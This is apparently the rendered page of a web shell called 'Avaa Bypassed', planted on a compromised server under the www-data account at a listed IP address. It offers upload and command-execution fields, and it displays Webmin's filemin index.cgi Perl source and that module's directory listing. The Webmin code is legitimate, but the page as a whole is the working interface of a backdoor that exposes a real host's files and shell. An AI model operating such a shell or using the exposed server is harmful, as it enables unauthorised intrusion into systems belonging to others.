[ Avaa Bypassed ]

Upload:

Command:

www-data@3.15.147.225: ~ $ 
#!/usr/bin/perl
# File manager written in perl

require './filemin-lib.pl';

&ReadParse();
get_paths();

unless (opendir ( DIR, $cwd )) {
    $path="";
    print_errors($text{'error_opendir'}." ".&html_escape($cwd)." ".$!);
} else {
    &ui_print_header(undef, $module_info{'name'}, "", undef, 0 , 0, 0, "<a href='config.cgi?path=".&urlize($path)."' data-config-pagination='$userconfig{'per_page'}'>$text{'module_config'}</a>");

    my %acls;
    my %attributes;
    my $setype = get_selinux_command_type();
    my %secontext;

    # Push file names with full paths to array, filtering out "." and ".."
    @list = map { &simplify_path("$cwd/$_") } grep { $_ ne '.' && $_ ne '..' } readdir(DIR);
    closedir(DIR);

    # Filter out not allowed paths
    if (&test_allowed_paths()) {
        for $path (@allowed_paths) {
            my $slashed = $path;
            $slashed .= "/" if ($slashed !~ /\/$/);
            push @tmp_list, grep { $slashed =~ /^\Q$_\E\// ||
				   $_ =~ /\Q$slashed\E/ } @list;
        }
        # Remove duplicates
        my %hash = map { $_, 1 } @tmp_list;
        @list = keys %hash;
    }

    # List ACLs
    if ($userconfig{'columns'} =~ /acls/ && get_acls_status()) {
        my $command = get_list_acls_command() . " " . join(' ', map {quotemeta("$_")} @list);
        my $output  = `$command`;
        my @aclsArr;
        foreach my $aclsStr (split(/\n\n/, $output)) {
            $aclsStr =~ /#\s+file:\s*(.*)/;
            my ($file)  = ($aclsStr =~ /#\s+file:\s*(.*)/);
            my @aclsA = ($aclsStr =~ /^(?!(#|user::|group::|other::))([\w\:\-\_]+)/gm);
            push(@aclsArr, [$file, \@aclsA]);
        }
        %acls = map {$_->[0] => ('<span data-acls>' . join("<br>", (grep /\S/, @{ $_->[1] })) . '</span>')} @aclsArr;
    }

    # List attributes
    if ( $userconfig{'columns'} =~ /attributes/ && get_attr_status() ) {
        my $command = get_attr_command() . join( ' ', map { quotemeta("$_") } @list );
        my $output = `$command`;
        my @attributesArr =
          map { [ split( /\s+/, $_, 2 ) ] } split( /\n/, $output );
        %attributes = map { $_->[1] => ('<span data-attributes>' . $_->[0] . '</span>') } @attributesArr;
    }

    # List security context
    if ( $userconfig{'columns'} =~ /selinux/ && get_selinux_status() ) {
        my $command = get_selinux_command() . join( ' ', map { quotemeta("$_") } @list );
        my $output = `$command`;
        ( !$setype && ( $output =~ s/\n//g, $output =~ s/,\s/,/g ) );
        my $delimiter = ( $setype ? '\n' : ',' );
        my @searray =
          map { [ split( /\s+/, $_, 2 ) ] } split( /$delimiter/, $output );
        %secontext = map { $_->[1] => ($_->[0] eq "?" ? undef : ('<span data-secontext>' . $_->[0] . '</span>') ) } @searray;
    }

    # Get info about directory entries
    @info = map { [ $_, lstat($_), &clean_mimetype($_), -d, -l $_, $secontext{$_}, $attributes{$_}, $acls{$_} ] } @list;

    # Filter out folders
    @folders = map {$_} grep {$_->[15] == 1 } @info;

    # Filter out files
    @files = map {$_} grep {$_->[15] != 1 } @info;

    # Sort stuff by name
    @folders = sort { $a->[0] cmp $b->[0] } @folders;
    @files = sort { $a->[0] cmp $b->[0] } @files;

    # Recreate list
    undef(@list);
    push @list, @folders, @files;

    print_interface();
    &ui_print_footer("/", $text{'index'});
}

Filemanager

DIR : / usr/ share/ webmin/ filemin/
Name Type Size Permission Actions
images Folder 0755
lang Folder 0755
unauthenticated Folder 0755
CHANGELOG File 9.22 KB 0644
acl_security.pl File 2.26 KB 0644
bookmark.cgi File 326 B 0755
chattr.cgi File 1007 B 0755
chcon.cgi File 979 B 0755
chmod.cgi File 2.42 KB 0755
chown.cgi File 983 B 0755
compress.cgi File 750 B 0755
config File 20 B 0644
config.cgi File 2.27 KB 0755
config.info File 172 B 0644
config.info.ar File 97 B 0644
config.info.ca File 52 B 0644
config.info.de File 61 B 0644
config.info.fr File 60 B 0644
config.info.it File 199 B 0644
copy.cgi File 362 B 0755
create_file.cgi File 559 B 0755
create_folder.cgi File 550 B 0755
cut.cgi File 361 B 0755
defaultacl File 373 B 0644
defaultuconf File 124 B 0644
delete.cgi File 352 B 0755
download.cgi File 799 B 0755
edit_file.cgi File 1.77 KB 0755
extract.cgi File 1.49 KB 0755
filemin-lib.pl File 23.78 KB 0644
http_download.cgi File 1.34 KB 0755
index.cgi File 3.29 KB 0755
module.info File 137 B 0644
module.info.af File 0 B 0644
module.info.af.auto File 112 B 0644
module.info.ar File 116 B 0644
module.info.ar.auto File 32 B 0644
module.info.be File 0 B 0644
module.info.be.auto File 137 B 0644
module.info.bg File 0 B 0644
module.info.bg.auto File 164 B 0644
module.info.ca File 89 B 0644
module.info.ca.auto File 24 B 0644
module.info.cs File 0 B 0644
module.info.cs.auto File 115 B 0644
module.info.da File 0 B 0644
module.info.da.auto File 101 B 0644
module.info.de File 88 B 0644
module.info.de.auto File 21 B 0644
module.info.el File 0 B 0644
module.info.el.auto File 209 B 0644
module.info.es File 0 B 0644
module.info.es.auto File 140 B 0644
module.info.eu File 0 B 0644
module.info.eu.auto File 131 B 0644
module.info.fa File 0 B 0644
module.info.fa.auto File 137 B 0644
module.info.fi File 0 B 0644
module.info.fi.auto File 110 B 0644
module.info.fr File 0 B 0644
module.info.fr.auto File 136 B 0644
module.info.he File 0 B 0644
module.info.he.auto File 125 B 0644
module.info.hr File 0 B 0644
module.info.hr.auto File 118 B 0644
module.info.hu File 0 B 0644
module.info.hu.auto File 109 B 0644
module.info.it File 104 B 0644
module.info.ja File 0 B 0644
module.info.ja.auto File 137 B 0644
module.info.ko File 0 B 0644
module.info.ko.auto File 118 B 0644
module.info.lt File 0 B 0644
module.info.lt.auto File 122 B 0644
module.info.lv File 0 B 0644
module.info.lv.auto File 125 B 0644
module.info.ms File 0 B 0644
module.info.ms.auto File 113 B 0644
module.info.mt File 0 B 0644
module.info.mt.auto File 120 B 0644
module.info.nl File 0 B 0644
module.info.nl.auto File 108 B 0644
module.info.no File 22 B 0644
module.info.no.auto File 75 B 0644
module.info.pl File 0 B 0644
module.info.pl.auto File 115 B 0644
module.info.pt File 0 B 0644
module.info.pt.auto File 133 B 0644
module.info.pt_BR File 0 B 0644
module.info.pt_BR.auto File 142 B 0644
module.info.ro File 0 B 0644
module.info.ro.auto File 120 B 0644
module.info.ru File 0 B 0644
module.info.ru.auto File 194 B 0644
module.info.sk File 0 B 0644
module.info.sk.auto File 126 B 0644
module.info.sl File 0 B 0644
module.info.sl.auto File 118 B 0644
module.info.sv File 0 B 0644
module.info.sv.auto File 99 B 0644
module.info.th File 0 B 0644
module.info.th.auto File 228 B 0644
module.info.tr File 0 B 0644
module.info.tr.auto File 121 B 0644
module.info.uk File 0 B 0644
module.info.uk.auto File 188 B 0644
module.info.ur File 0 B 0644
module.info.ur.auto File 145 B 0644
module.info.vi File 0 B 0644
module.info.vi.auto File 139 B 0644
module.info.zh File 0 B 0644
module.info.zh.auto File 101 B 0644
module.info.zh_TW File 0 B 0644
module.info.zh_TW.auto File 110 B 0644
paste.cgi File 1.23 KB 0755
prefs.info File 10 B 0644
rename.cgi File 431 B 0755
safeacl File 50 B 0644
save_config.cgi File 858 B 0755
save_file.cgi File 705 B 0755
search.cgi File 572 B 0755
setfacl.cgi File 1.66 KB 0755
upload.cgi File 5.23 KB 0755

© 2025 Coded By Avaa Code.